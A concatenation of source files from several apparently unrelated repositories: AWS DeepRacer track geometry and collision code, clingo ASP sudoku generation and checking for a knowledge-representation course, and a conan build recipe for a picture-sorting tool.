self._track_data_.reverse_dir = not self._track_data_.reverse_dir
def _clear_data(self):
'''clear data at the beginning of a new episode
'''
self._curr_crashed_object_name = ''
self._reset_count = 0
self._reset_rules_manager.reset()
self._ctrl_status[AgentCtrlStatus.AGENT_PHASE.value] = AgentPhase.RUN.value
for key in self._prev_waypoints_:
self._prev_waypoints_[key] = Point(0, 0)
for key in self._data_dict_:
if key != 'start_ndist':
self._data_dict_[key] = 0.0
def update(self, data):
self._is_training_ = data == RunPhase.TRAIN
```
#### File: markov/track_geom/track_data.py
```python
from collections import OrderedDict, deque
from enum import Enum, unique
import math
import os
import threading
import numpy as np
import rospkg
import rospy
from geometry_msgs.msg import Pose
from shapely.geometry import Point, Polygon
from shapely.geometry.polygon import LinearRing, LineString
from markov.agent_ctrl.constants import RewardParam
from markov.cameras.frustum_manager import FrustumManager
from markov.track_geom.constants import TrackNearPnts, TrackNearDist
from markov.track_geom.utils import euler_to_quaternion, apply_orientation, find_prev_next, quaternion_to_euler
from markov.log_handler.deepracer_exceptions import GenericRolloutException
from markov import utils
@unique
class FiniteDifference(Enum):
CENTRAL_DIFFERENCE = 1
FORWARD_DIFFERENCE = 2
class TrackLine(object):
def __init__(self, line):
self.line = line
self.ndists = [self.line.project(Point(p), normalized=True)
for p in self.line.coords[:-1]] + [1.0]
def __getattr__(self, name):
return getattr(self.line, name)
def find_prev_next_waypoints(self, distance, normalized=False):
ndist = distance if normalized else distance / self.line.length
return find_prev_next(self.ndists, ndist)
def interpolate_yaw(self, distance, normalized=False, position=None,
finite_difference=FiniteDifference.CENTRAL_DIFFERENCE):
prev_index, next_index = self.find_prev_next_waypoints(distance, normalized)
if finite_difference == FiniteDifference.CENTRAL_DIFFERENCE:
yaw = math.atan2(self.line.coords[next_index][1] - self.line.coords[prev_index][1],
self.line.coords[next_index][0] - self.line.coords[prev_index][0])
elif finite_difference == FiniteDifference.FORWARD_DIFFERENCE:
if not position: position = self.interpolate(distance, normalized)
yaw = math.atan2(self.line.coords[next_index][1] - position.y,
self.line.coords[next_index][0] - position.x)
else:
raise ValueError("Unrecognized FiniteDifference enum value")
return yaw
def interpolate_pose(self, distance, normalized=False,
finite_difference=FiniteDifference.CENTRAL_DIFFERENCE):
pose = Pose()
position = self.interpolate(distance, normalized)
yaw = self.interpolate_yaw(distance, normalized, position, finite_difference)
orientation = euler_to_quaternion(yaw=yaw)
pose.position.x = position.x
pose.position.y = position.y
pose.position.z = 0.0
pose.orientation.x = orientation[0]
pose.orientation.y = orientation[1]
pose.orientation.z = orientation[2]
pose.orientation.w = orientation[3]
return pose
class TrackData(object):
    '''This class is responsible for managing all the track geometry; the object should
be created and shared between agents on the track
'''
    # The track data will be a singleton to prevent copying across multiple agents
_instance_ = None
@staticmethod
def get_instance():
        '''Method for getting a reference to the track data object'''
if TrackData._instance_ is None:
TrackData()
return TrackData._instance_
@property
def center_line(self):
'''center line property depending on direction
'''
if self._reverse_dir_:
return self._center_line_reverse_
return self._center_line_forward_
@property
def inner_border(self):
        '''inner border property depending on direction
'''
if self._reverse_dir_:
return self._inner_border_reverse_
return self._inner_border_forward_
@property
def outer_border(self):
        '''outer border property depending on direction
'''
if self._reverse_dir_:
return self._outer_border_reverse_
return self._outer_border_forward_
@property
def inner_lane(self):
'''inner lane property depending on direction
'''
if self._reverse_dir_:
return self._inner_lane_reverse_
return self._inner_lane_forward_
@property
def outer_lane(self):
'''outer lane property depending on direction
'''
if self._reverse_dir_:
return self._outer_lane_reverse_
return self._outer_lane_forward_
@property
def reverse_dir(self):
'''reverse direction getter
'''
return self._reverse_dir_
@property
def is_ccw(self):
'''ccw direction getter
'''
return self._is_ccw_ ^ self._reverse_dir_
@reverse_dir.setter
def reverse_dir(self, val):
'''reverse direction setter
'''
self._reverse_dir_ = val
@property
def park_positions(self):
'''park positions getter
'''
return self._park_positions_
@park_positions.setter
def park_positions(self, val):
'''park positions setter
'''
self._park_positions_ = deque(val)
def pop_park_position(self):
'''pop first available park position
'''
return self._park_positions_.popleft()
def __init__(self):
'''Instantiates the class and creates clients for the relevant ROS services'''
self._park_positions_ = deque()
self._reverse_dir_ = utils.str2bool(rospy.get_param("REVERSE_DIR", False))
if TrackData._instance_ is not None:
raise GenericRolloutException("Attempting to construct multiple TrackData objects")
try:
rospack = rospkg.RosPack()
deepracer_path = rospack.get_path("deepracer_simulation_environment")
waypoints_path = os.path.join(deepracer_path, "routes",
"{}.npy".format(rospy.get_param("WORLD_NAME")))
self._is_bot_car_ = int(rospy.get_param("NUMBER_OF_BOT_CARS", 0)) > 0
self._bot_car_speed_ = float(rospy.get_param("BOT_CAR_SPEED", 0.0))
waypoints = np.load(waypoints_path)
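            # waypoint array layout (inferred from the slicing below): columns 0:2 hold the
            # center line, 2:4 the inner border and 4:6 the outer border, as (x, y) pairs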
self.is_loop = np.all(waypoints[0, :] == waypoints[-1, :])
poly_func = LinearRing if self.is_loop else LineString
# forward direction
self._center_line_forward_ = TrackLine(poly_func(waypoints[:, 0:2]))
self._inner_border_forward_ = TrackLine(poly_func(waypoints[:, 2:4]))
self._outer_border_forward_ = TrackLine(poly_func(waypoints[:, 4:6]))
self._inner_lane_forward_ = TrackLine(poly_func((waypoints[:, 2:4] + \
waypoints[:, 0:2])/2))
self._outer_lane_forward_ = TrackLine(poly_func((waypoints[:, 4:6] + \
waypoints[:, 0:2])/2))
# reversed direction
self._center_line_reverse_ = TrackLine(poly_func(waypoints[:, 0:2][::-1]))
self._inner_border_reverse_ = TrackLine(poly_func(waypoints[:, 2:4][::-1]))
self._outer_border_reverse_ = TrackLine(poly_func(waypoints[:, 4:6][::-1]))
self._inner_lane_reverse_ = TrackLine(poly_func((waypoints[:, 2:4][::-1] + \
waypoints[:, 0:2][::-1]) / 2))
self._outer_lane_reverse_ = TrackLine(poly_func((waypoints[:, 4:6][::-1] + \
waypoints[:, 0:2][::-1]) / 2))
if self.is_loop:
self._inner_poly_ = Polygon(self.center_line, [self.inner_border])
self._road_poly_ = Polygon(self.outer_border, [self.inner_border])
self._is_ccw_ = self._center_line_forward_.is_ccw
else:
self._inner_poly_ = Polygon(np.vstack((self.center_line.line,
np.flipud(self.inner_border))))
self._road_poly_ = Polygon(np.vstack((self.outer_border,
np.flipud(self.inner_border))))
self._is_ccw_ = True
self.object_poses = OrderedDict()
self.object_dims = OrderedDict()
self.noncollidable_objects = set()
self.noncollidable_object_lock = threading.Lock()
# There should only be one track data object
TrackData._instance_ = self
# declare a lock to prevent read and write at the same time
self._lock_ = threading.Lock()
except Exception as ex:
raise GenericRolloutException('Failed to create track data: {}'.format(ex))
def initialize_object(self, name, initial_pose, object_dimensions):
self.object_poses[name] = initial_pose
self.object_dims[name] = object_dimensions
def update_object_pose(self, name, object_pose):
if name in self.object_poses:
self.object_poses[name] = object_pose
else:
raise GenericRolloutException('Failed to update object (unrecognized): {}'.format(name))
def get_object_pose(self, name):
return self.object_poses[name]
def find_prev_next_waypoints(self, distance, normalized=False):
return self.center_line.find_prev_next_waypoints(distance, normalized)
@staticmethod
def get_nearest_dist(near_pnt_dict, model_point):
'''Auxiliary method for computing the distance to the nearest points given in
near_pnt_dict.
near_pnt_dict - Dictionary containing the keys specified in TrackNearPnts
model_point - Object returned by calling the model state service which contains
the position data for the agent
'''
try:
dist_from_cent = near_pnt_dict[TrackNearPnts.NEAR_PNT_CENT.value].distance(model_point)
dist_from_in = near_pnt_dict[TrackNearPnts.NEAR_PNT_IN.value].distance(model_point)
dist_from_out = near_pnt_dict[TrackNearPnts.NEAR_PNT_OUT.value].distance(model_point)
return {TrackNearDist.NEAR_DIST_CENT.value : dist_from_cent,
TrackNearDist.NEAR_DIST_IN.value : dist_from_in,
TrackNearDist.NEAR_DIST_OUT.value : dist_from_out}
except Exception as ex:
raise GenericRolloutException("Unable to compute nearest distance: {}".format(ex))
def get_track_length(self):
'''Returns the length of the track'''
try:
return self.center_line.length
except Exception as ex:
            raise GenericRolloutException("Unable to get track length: {}".format(ex))
def get_way_pnts(self):
'''Returns a list containing all the way points'''
try:
return list(self.center_line.coords)
except Exception as ex:
raise GenericRolloutException("Unable to get way points: {}".format(ex))
def get_norm_dist(self, model_point):
'''Returns the normalized position of the agent relative to the track
model_point - Object returned by calling the model state service which contains
the position data for the agent
'''
try:
return self.center_line.project(model_point, normalized=True)
except Exception as ex:
raise GenericRolloutException("Unable to get norm dist: {}".format(ex))
def get_nearest_points(self, model_point):
'''Returns a dictionary with the keys specified in TrackNearPnts containing
the nearest way points to the agent.
model_point - Object returned by calling the model state service which contains
the position data for the agent
'''
try:
near_pnt_ctr = \
self.center_line.interpolate(self.get_norm_dist(model_point), normalized=True)
near_pnt_in = \
self.inner_border.interpolate(self.inner_border.project(near_pnt_ctr))
near_pnt_out = \
self.outer_border.interpolate(self.outer_border.project(near_pnt_ctr))
return {TrackNearPnts.NEAR_PNT_CENT.value : near_pnt_ctr,
TrackNearPnts.NEAR_PNT_IN.value : near_pnt_in,
TrackNearPnts.NEAR_PNT_OUT.value : near_pnt_out}
except Exception as ex:
raise GenericRolloutException("Unable to get nearest points: {}".format(ex))
def get_object_reward_params(self, racecar_name, model_point, car_pose):
'''Returns a dictionary with object-related reward function params.'''
with self._lock_:
try:
object_locations = [[pose.position.x, pose.position.y]
for name, pose in self.object_poses.items() if racecar_name not in name]
object_poses = [pose for name, pose in self.object_poses.items() if racecar_name not in name]
if not object_locations:
return {}
# Sort the object locations based on projected distance
num_objects = len(object_locations)
object_pdists = [self.center_line.project(Point(p)) for p in object_locations]
object_headings = [0.0] * num_objects
object_speeds = [0.0] * num_objects
if self._is_bot_car_:
for i, object_pose in enumerate(object_poses):
_, _, yaw = quaternion_to_euler(x=object_pose.orientation.x,
y=object_pose.orientation.y,
z=object_pose.orientation.z,
w=object_pose.orientation.w)
object_headings[i] = yaw
object_speeds[i] = self._bot_car_speed_
# Find the prev/next objects
model_pdist = self.center_line.project(model_point)
object_order = np.argsort(object_pdists)
object_pdists_ordered = [object_pdists[i] for i in object_order]
prev_object_index, next_object_index = find_prev_next(object_pdists_ordered, model_pdist)
prev_object_index = object_order[prev_object_index]
next_object_index = object_order[next_object_index]
# Figure out which one is the closest
object_points = [Point([object_location[0], object_location[1]])
for object_location in object_locations]
prev_object_point = object_points[prev_object_index]
next_object_point = object_points[next_object_index]
prev_object_dist = model_point.distance(prev_object_point)
next_object_dist = model_point.distance(next_object_point)
if prev_object_dist < next_object_dist:
closest_object_point = prev_object_point
else:
closest_object_point = next_object_point
                # Figure out whether each object is left of center based on direction
objects_left_of_center = [self._inner_poly_.contains(p) ^ (not self.is_ccw) \
for p in object_points]
# Get object distances to centerline
objects_distance_to_center = [self.center_line.distance(p)
for p in object_points]
# Figure out if the next object is in the camera view
objects_in_camera = self.get_objects_in_camera_frustums(agent_name=racecar_name,
car_pose=car_pose)
is_next_object_in_camera = any(object_in_camera_idx == next_object_index
for object_in_camera_idx, _ in objects_in_camera)
# Determine if they are in the same lane
return {RewardParam.CLOSEST_OBJECTS.value[0]: [prev_object_index, next_object_index],
RewardParam.OBJECT_LOCATIONS.value[0]: object_locations,
RewardParam.OBJECTS_LEFT_OF_CENTER.value[0]: objects_left_of_center,
RewardParam.OBJECT_SPEEDS.value[0]: object_speeds,
RewardParam.OBJECT_HEADINGS.value[0]: object_headings,
RewardParam.OBJECT_CENTER_DISTS.value[0]: objects_distance_to_center,
RewardParam.OBJECT_CENTERLINE_PROJECTION_DISTANCES.value[0]: object_pdists,
RewardParam.OBJECT_IN_CAMERA.value[0]: is_next_object_in_camera
}
except Exception as ex:
raise GenericRolloutException("Unable to get object reward params: {}".format(ex))
def get_distance_from_next_and_prev(self, model_point, prev_index, next_index):
        '''Returns a tuple, where the first value is the distance to the given previous point
        and the second value is the distance to the given next point.
model_point - Object returned by calling the model state service which contains
the position data for the agent
prev_index - Integer representing the index of the previous point
next_index - Integer representing the index of the next point
'''
try:
dist_from_prev = model_point.distance(Point(self.center_line.coords[prev_index]))
dist_from_next = model_point.distance(Point(self.center_line.coords[next_index]))
return dist_from_prev, dist_from_next
except Exception as ex:
raise GenericRolloutException("Unable to get distance to prev and next points: {}".format(ex))
def points_on_track(self, points):
        '''Returns a boolean list, where entries of true represent a point in the points list
        being on the track, and entries of false represent a point in the points list being
        off the track.
points - List of points who will be checked for being on or off the track
'''
try:
return [self._road_poly_.contains(pnt) for pnt in points]
except Exception as ex:
raise GenericRolloutException("Unable to get points on track {}".format(ex))
@staticmethod
def get_object_bounding_rect(object_pose, object_dims):
"""
Returns a list of points (numpy.ndarray) of bounding rectangle on the floor.
object_pose - Object pose object.
object_dims - Tuple representing the dimension of object (width, height)
"""
half_width = 0.5 * (object_dims.value[0])
half_length = 0.5 * (object_dims.value[1])
local_verts = np.array([[+half_length, +half_width, 0.0],
[+half_length, -half_width, 0.0],
[-half_length, -half_width, 0.0],
[-half_length, +half_width, 0.0]])
object_position = np.array([object_pose.position.x,
object_pose.position.y,
object_pose.position.z])
object_orientation = np.array([object_pose.orientation.x,
object_pose.orientation.y,
object_pose.orientation.z,
object_pose.orientation.w])
return [object_position
+ apply_orientation(object_orientation, p)
for p in local_verts]
def add_noncollidable_object(self, object_name):
"""
Add object_name as non-collidable object
Args:
object_name (str): the object name to add to non-collidable object list
"""
with self.noncollidable_object_lock:
self.noncollidable_objects.add(object_name)
def remove_noncollidable_object(self, object_name):
"""
Remove object_name from non-collidable object name list
Args:
object_name (str): the object_name to remove from non-collidable list
"""
with self.noncollidable_object_lock:
self.noncollidable_objects.discard(object_name)
def is_object_collidable(self, object_name):
"""
Check whether object with given object_name is collidable or not
Args:
object_name: name of object to check
Returns: True if collidable otherwise false
"""
with self.noncollidable_object_lock:
return object_name not in self.noncollidable_objects
def get_collided_object_name(self, racecar_wheel_points, racecar_name):
'''Get object name that racecar collide into
Args:
racecar_wheel_points (list): List of points that specifies
the wheels of the training car
racecar_name (string): racecar name
Returns:
string: Crashed object name if there is a crashed object. Otherwise ''
Raises:
GenericRolloutException: Unable to detect collision
'''
try:
with self.noncollidable_object_lock:
noncollidable_objects = self.noncollidable_objects.copy()
for object_name in self.object_poses.keys():
if object_name != racecar_name and object_name not in noncollidable_objects:
object_pose = self.object_poses[object_name]
object_dims = self.object_dims[object_name]
object_boundary = Polygon(TrackData.get_object_bounding_rect(object_pose, object_dims))
if any([object_boundary.contains(p) for p in racecar_wheel_points]):
return object_name
return ''
except Exception as ex:
raise GenericRolloutException("Unable to detect collision {}".format(ex))
def get_objects_in_camera_frustums(self, agent_name, car_pose, object_order=None):
"""Returns list of tuple (idx, object.pose) for the objects
that are in camera frustums"""
frustum = FrustumManager.get_instance().get(agent_name=agent_name)
frustum.update(car_pose)
objects_in_frustum = []
object_order = object_order if object_order is not None else range(len(self.object_poses.values()))
object_poses = [pose for pose in self.object_poses.values()]
object_dims = [pose for pose in self.object_dims.values()]
for idx, order_idx in enumerate(object_order):
object_pose = object_poses[order_idx]
object_dim = object_dims[order_idx]
object_position = np.array([object_pose.position.x,
object_pose.position.y,
object_pose.position.z])
object_points = TrackData.get_object_bounding_rect(object_pose, object_dim)
object_points.append(object_position)
# Check collision between frustum and object points
# object points contains object position + points in bounding rectangle on the floor
# Camera pitch and roll are fixed so checking bounding rectangle on the floor should be good enough
# One edge case that this detection can miss is similar as below:
# FFFFFFFFFFFFFFF
# F F
# AAAFAAAAAAAAAAAFAAAAAAAAAAAAAA
# A F F A
# A F F X A
# AAAAAAFAAAAAFAAAAAAAAAAAAAAAAA
# F F
# FFF
# F = frustum / A = object / X = center of mass of the object
if any([frustum.is_visible(p) for p in object_points]):
objects_in_frustum.append((idx, object_pose))
return objects_in_frustum
``` |
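The `TrackLine` wrapper above delegates to a shapely line and adds waypoint-index, yaw and pose interpolation helpers. Below is a minimal usage sketch, not taken from the repository; it assumes a ROS environment in which the `markov` package (and shapely) can be imported, and the square "track" is made up.
```python
# Hypothetical TrackLine usage (assumes the markov package and its ROS
# dependencies are importable; the square "track" below is made up).
from shapely.geometry.polygon import LinearRing
from markov.track_geom.track_data import TrackLine, FiniteDifference

center_line = TrackLine(LinearRing([(0, 0), (10, 0), (10, 10), (0, 10)]))

# pose (position + yaw encoded as a quaternion) half way around the ring
pose = center_line.interpolate_pose(0.5, normalized=True,
                                    finite_difference=FiniteDifference.CENTRAL_DIFFERENCE)
print(pose.position.x, pose.position.y)

# indices of the waypoints bracketing that normalized distance
print(center_line.find_prev_next_waypoints(0.5, normalized=True))
```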
{
"source": "jochemloedeman/KRR-course-2021",
"score": 3
} |
#### File: KRR-course-2021/hw2/generate_inputs_asp.py
```python
import clingo
from sudoku_asp import get_definitions, get_input_encoding, get_generate_encoding, get_constraints_encoding, \
to_solution_rep
from sudoku_func import pretty_repr
def get_hide_encoding(given):
hide_encoding = """"""
hide_encoding += """
{ hide(R,C): cell(R,C,_) }.
input(R,C,X) :- solution(R,C,X), not hide(R,C).
"""
hide_encoding += f":- not {given} {{ input(R,C,X) : cell(R,C,_), value(X) }} {given}.\n"
return hide_encoding
def get_saturation_encoding():
saturation_encoding = """"""
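    # The rules below implement the standard ASP saturation technique: candidate
    # "other solutions" are guessed disjunctively and saturated whenever they are
    # invalid or incorrect, so an answer set survives only if every alternative
    # assignment fails, i.e. the generated puzzle has a unique solution.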
# generate all candidates for other solutions
saturation_encoding += "other_solution(R,C,X) : value(X) :- cell(R,C,_).\n"
# solutions are invalid when they do not match the input sudoku, and are incorrect when they do not
# satisfy the constraints of BombKnight sudoku
saturation_encoding += """
invalid :- input(R,C,X), other_solution(R,C,Y), X!=Y.
incorrect :- other_solution(R,C,X), other_solution(R,D,Y), C!=D, X==Y.
incorrect :- other_solution(R,C,X), other_solution(S,C,Y), R!=S, X==Y.
incorrect :- cell(R,C,A), cell(S,D,B), A!=B, block(A,V,H), block(B,Z,W), other_solution(R,C,X), other_solution(S,D,Y), V==Z, H==W, X==Y.
incorrect :- cell(R,C,A), cell(S,D,B), A!=B, adjacent(A,B), other_solution(R,C,X), other_solution(S,D,Y), X==Y.
incorrect :- cell(R,C,A), cell(S,D,B), A!=B, knight(A,B), other_solution(R,C,X), other_solution(S,D,Y), X==Y.
"""
# other solutions identical to the original solution are also incorrect
saturation_encoding += """
incorrect :- other_solution(R,C,X) : solution(R,C,X).
"""
# now saturate when invalid and/or incorrect
saturation_encoding += """
saturate :- invalid.
saturate :- incorrect.
other_solution(R,C,X) :- cell(R,C,_), value(X), saturate.
invalid :- saturate.
incorrect :- saturate.
:- not saturate.
"""
return saturation_encoding
def get_input_sudokus(k, given):
asp_program = """"""
asp_program += get_definitions(k)
asp_program += get_input_encoding(k)
asp_program += get_generate_encoding()
asp_program += get_constraints_encoding()
asp_program += get_hide_encoding(given)
asp_program += get_saturation_encoding()
# suppress annoying warning
asp_program += "#defined supplied/3.\n"
asp_program += "#show input/3."
file = open("generate_inputs_asp.py.txt", "w")
file.truncate(0)
file.write(asp_program)
file.close()
control = clingo.Control()
control.add("base", [], asp_program)
control.ground([("base", [])])
control.configuration.solve.models = 0
with control.solve(yield_=True) as handle:
for model in handle:
yield model
def to_input_rep(answer_set, k):
solution = []
for _ in range(k * k):
solution.append([0] * k * k)
entries = str(answer_set).split()
for entry in entries:
entry = entry.removesuffix(")")
entry = entry.removeprefix("input(")
arguments = [int(x) for x in entry.split(',')]
solution[arguments[0]][arguments[1]] = arguments[2]
return solution
def generate_input_sudokus(k, given):
for answer_set in get_input_sudokus(k, given):
yield to_input_rep(answer_set, k)
if __name__ == '__main__':
k = 3
given = 10
for input_sudoku in generate_input_sudokus(k, given):
print(pretty_repr(input_sudoku, k))
```
#### File: KRR-course-2021/hw2/sudoku_func.py
```python
import itertools
from copy import deepcopy
from dataclasses import dataclass
from typing import List
import clingo
from pysat.formula import CNF
from pysat.solvers import MinisatGH
@dataclass
class TestInput:
k: int
sudoku: List[List[int]]
num_solutions: int
test_inputs = [
TestInput(
k=3,
sudoku=[[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 3, 0, 0, 8, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 4, 0, 0, 0, 5],
[0, 0, 0, 0, 0, 0, 0, 2, 7],
[0, 0, 0, 0, 0, 0, 3, 0, 0],
[0, 0, 0, 0, 0, 0, 9, 0, 0],
[0, 0, 0, 0, 5, 6, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0]],
num_solutions=1
),
TestInput(
k=3,
sudoku=[[9, 5, 6, 1, 2, 4, 0, 0, 0],
[3, 7, 8, 9, 5, 6, 0, 0, 0],
[1, 2, 4, 3, 7, 8, 0, 0, 0],
[8, 9, 5, 6, 1, 2, 0, 0, 0],
[4, 3, 7, 8, 9, 5, 0, 0, 0],
[6, 1, 2, 4, 3, 0, 0, 0, 0],
[7, 8, 9, 5, 6, 0, 0, 0, 0],
[2, 4, 3, 7, 8, 0, 0, 0, 0],
[5, 6, 1, 2, 4, 0, 0, 0, 0]],
num_solutions=1
),
TestInput(
k=3,
sudoku=[[9, 5, 6, 0, 0, 4, 0, 0, 0],
[3, 7, 8, 9, 5, 6, 0, 0, 0],
[0, 0, 4, 3, 7, 8, 0, 0, 0],
[8, 9, 5, 6, 0, 0, 0, 0, 0],
[4, 3, 7, 8, 9, 5, 0, 0, 0],
[6, 0, 0, 4, 3, 0, 0, 0, 0],
[7, 8, 9, 5, 6, 0, 0, 0, 0],
[0, 4, 3, 7, 8, 0, 0, 0, 0],
[5, 6, 0, 0, 4, 0, 0, 0, 0]],
num_solutions=2
),
TestInput(
k=3,
sudoku=[[9, 0, 0, 0, 0, 4, 0, 0, 0],
[3, 0, 0, 0, 0, 6, 0, 0, 0],
[1, 0, 0, 0, 0, 8, 0, 0, 0],
[8, 0, 0, 0, 0, 0, 0, 0, 0],
[4, 0, 0, 0, 0, 0, 0, 0, 0],
[6, 0, 0, 0, 0, 0, 0, 0, 0],
[7, 0, 0, 0, 0, 0, 0, 0, 0],
[2, 0, 0, 0, 0, 0, 0, 0, 0],
[5, 0, 0, 0, 0, 0, 0, 0, 0]],
num_solutions=1
),
TestInput(
k=4,
sudoku=[[3, 1, 15, 13, 7, 16, 5, 12, 4, 2, 14, 10, 8, 9, 6, 0],
[6, 4, 5, 8, 9, 11, 2, 10, 16, 15, 7, 3, 1, 14, 13, 0],
[10, 7, 14, 2, 15, 6, 1, 13, 9, 11, 8, 12, 4, 16, 3, 0],
[12, 16, 9, 11, 3, 14, 4, 8, 6, 5, 1, 13, 2, 15, 7, 0],
[4, 2, 10, 1, 16, 9, 12, 0, 3, 7, 15, 14, 5, 6, 8, 0],
[9, 8, 3, 6, 4, 5, 13, 0, 1, 16, 12, 11, 7, 10, 2, 0],
[15, 13, 12, 14, 2, 8, 7, 0, 5, 10, 4, 9, 3, 1, 11, 0],
[11, 5, 16, 7, 10, 1, 14, 0, 2, 8, 13, 6, 12, 4, 9, 0],
[8, 10, 2, 3, 11, 4, 15, 0, 12, 1, 5, 7, 16, 13, 14, 0],
[16, 9, 13, 15, 8, 12, 6, 0, 14, 3, 10, 2, 11, 5, 1, 0],
[7, 14, 11, 0, 1, 2, 10, 0, 15, 13, 6, 4, 9, 8, 0, 0],
[1, 12, 6, 0, 14, 13, 3, 0, 8, 9, 11, 16, 15, 2, 0, 0],
[13, 3, 7, 0, 12, 15, 9, 0, 10, 14, 2, 1, 6, 11, 0, 0],
[14, 0, 1, 0, 5, 7, 16, 0, 11, 6, 3, 8, 13, 12, 0, 0],
[0, 0, 4, 0, 6, 3, 8, 0, 13, 12, 16, 5, 10, 7, 0, 0],
[5, 6, 8, 12, 13, 10, 11, 1, 7, 4, 9, 15, 14, 3, 0, 2]],
num_solutions=1
)
]
def check_solution(sudoku, k, solution):
"""
Checks if a given solution for a given BombKnightSudoku puzzle is correct.
"""
# Check if each row in the solution has different values
for row in solution:
if set(row) != set(range(1, k**2+1)):
return False
    # Check if each column in the solution has different values
for col in range(0, k**2):
if {solution[row][col]
for row in range(0, k**2)
} != set(range(1, k**2+1)):
return False
# Check the 'bomb' constraints
for row1, col1 in itertools.product(range(0, k**2), repeat=2):
for row_add, col_add in itertools.product([-1, 0, 1], repeat=2):
if row_add != 0 or col_add != 0:
row2 = row1 + row_add
col2 = col1 + col_add
if 0 <= row2 < k**2 and 0 <= col2 < k**2:
if solution[row1][col1] == solution[row2][col2]:
return False
# Check the 'knight' constraints
for row1, col1 in itertools.product(range(0, k**2), repeat=2):
for row_add, col_add in [(1, 2), (1, -2), (-1, 2), (-1, -2),
(2, 1), (-2, 1), (2, -1), (-2, -1)]:
if row_add != 0 or col_add != 0:
row2 = row1 + row_add
col2 = col1 + col_add
if 0 <= row2 < k**2 and 0 <= col2 < k**2:
if solution[row1][col1] == solution[row2][col2]:
return False
# Check if each block in the solution has different values
for block_row, block_col in itertools.product(range(0, k), repeat=2):
if {solution[block_row*k + inner_row][block_col*k + inner_col]
for inner_row, inner_col
in itertools.product(range(0, k), repeat=2)
} != set(range(1, k**2+1)):
return False
# Check if the solution matches the input
for row, col in itertools.product(range(0, k**2), repeat=2):
if sudoku[row][col] != 0 and sudoku[row][col] != solution[row][col]:
return False
# If all checks passed, return True
return True
def check_num_solutions(sudoku, k, num_solutions, solver):
"""
Checks if a given solving algorithm produces the right number of correct
solutions for a given BombKnightSudoku puzzle.
"""
# Iterate over num_solutions+1 solutions, check if each is correct,
# and add their string representations to a set
solution_set = set()
for solution in itertools.islice(solver(sudoku, k), num_solutions+1):
if not check_solution(sudoku, k, solution):
return False
solution_set.add(pretty_repr(solution, k))
# Return whether the set contains exactly the right amount of solutions
return len(solution_set) == num_solutions
def pretty_repr(sudoku, k):
"""
    Produces a pretty representation of a sudoku or solution.
"""
repr_sudoku = ""
numwidth = len(str(k**2))
def pretty_line(k):
return "." + ".".join(["-"*((numwidth+1)*k+1)]*k) + ".\n"
# Add a line separator at the beginning
repr_sudoku += pretty_line(k)
# Go through all rows of the sudoku
for rownum in range(0, k**2):
# Add a row of the sudoku
repr_sudoku += "| "
for outer_col in range(0, k):
for inner_col in range(0, k):
if sudoku[rownum][outer_col*k+inner_col] != 0:
repr_sudoku += str(
sudoku[rownum][outer_col*k+inner_col]
).zfill(numwidth) + " "
else:
repr_sudoku += " "*numwidth + " "
repr_sudoku += "| "
repr_sudoku += "\n"
# Add a line separator after every k'th row
if (rownum+1) % k == 0:
repr_sudoku += pretty_line(k)
# Return the constructed string (without trailing '\n')
return repr_sudoku[:-1]
``` |
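As a quick illustration of the checker above, the sketch below runs `check_solution` and `pretty_repr` on the trivial 1x1 puzzle. It is not part of the assignment files and assumes the module's own imports (clingo, python-sat) are installed so that `sudoku_func` can be imported.
```python
# Minimal sanity check (hypothetical, not part of the assignment files).
from sudoku_func import check_solution, pretty_repr

k = 1
sudoku = [[0]]    # 1x1 puzzle with no givens
solution = [[1]]  # the only possible filling

print(pretty_repr(solution, k))
print(check_solution(sudoku, k, solution))  # expected: True
```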
{
"source": "jochemsoons/KRR-course-2021",
"score": 4
} |
#### File: KRR-course-2021/hw1/hw1.py
```python
import clingo
def print_answer_sets(program):
# Load the answer set program, and call the grounder
control = clingo.Control()
control.add("base", [], program)
control.ground([("base", [])])
# Define a function that will be called when an answer set is found
# This function sorts the answer set alphabetically, and prints it
def on_model(model):
sorted_model = [str(atom) for atom in model.symbols(shown=True)]
sorted_model.sort()
print("Answer set: {{{}}}".format(", ".join(sorted_model)))
# Ask clingo to find all models (using an upper bound of 0 gives all models)
control.configuration.solve.models = 0
# Call the clingo solver, passing on the function on_model for when an answer set is found
answer = control.solve(on_model=on_model)
# Print a message when no answer set was found
if answer.satisfiable == False:
print("No answer sets")
""" EXERCISE 2 """
``` |
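One way to exercise `print_answer_sets` is sketched below; the toy choice program is made up for illustration and assumes clingo's Python bindings are installed, as `hw1.py` itself requires.
```python
# Hypothetical invocation of print_answer_sets with a tiny choice program.
from hw1 import print_answer_sets

print_answer_sets("""
    color(red; green).
    1 { chosen(C) : color(C) } 1.
""")
# Prints two answer sets (order may vary), e.g.:
# Answer set: {chosen(green), color(green), color(red)}
# Answer set: {chosen(red), color(green), color(red)}
```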
{
"source": "Jochen0x90h/PicSort",
"score": 2
} |
#### File: Jochen0x90h/PicSort/conanfile.py
```python
import os, shutil
from conans import ConanFile, CMake
# linux:
# install conan: pip3 install --user conan
# upgrade conan: pip3 install --upgrade --user conan
# macos:
# install conan: brew install conan
# create default profile: conan profile new default --detect
# create debug profile: copy ~/.conan/profiles/default to Debug, replace Release by Debug
def copy(src, dst):
if os.path.islink(src):
if os.path.lexists(dst):
os.unlink(dst)
linkto = os.readlink(src)
os.symlink(linkto, dst)
else:
shutil.copy(src, dst)
class Project(ConanFile):
name = "PicSorter"
description = "Tool for sorting pictures"
url = "https://github.com/Jochen0x90h/PicSort"
license = "MIT License"
settings = "os", "compiler", "build_type", "arch"
options = {
"debug": [False, True]}
default_options = {
"debug": False}
generators = "cmake"
exports_sources = "conanfile.py", "CMakeLists.txt", "src/*", "test/*"
requires = \
"boost/1.76.0", \
"glfw/3.3.3", \
"imgui/1.83", \
"libjpeg-turbo/2.0.5", \
"tinyxml2/8.0.0"
keep_imports = True
def imports(self):
# copy dependent libraries into the build folder
self.copy("*", src="@bindirs", dst="bin")
self.copy("*", src="@libdirs", dst="lib")
def configure_cmake(self):
cmake = CMake(self, build_type = "RelWithDebInfo" if self.options.debug and self.settings.build_type == "Release" else None)
cmake.configure()
return cmake
def build(self):
cmake = self.configure_cmake()
cmake.build()
def package(self):
# install from build directory into package directory
cmake = self.configure_cmake()
cmake.install()
# also copy dependent libraries into the package
self.copy("*.dll", "bin", "bin")
self.copy("*.dylib*", "lib", "lib", symlinks = True)
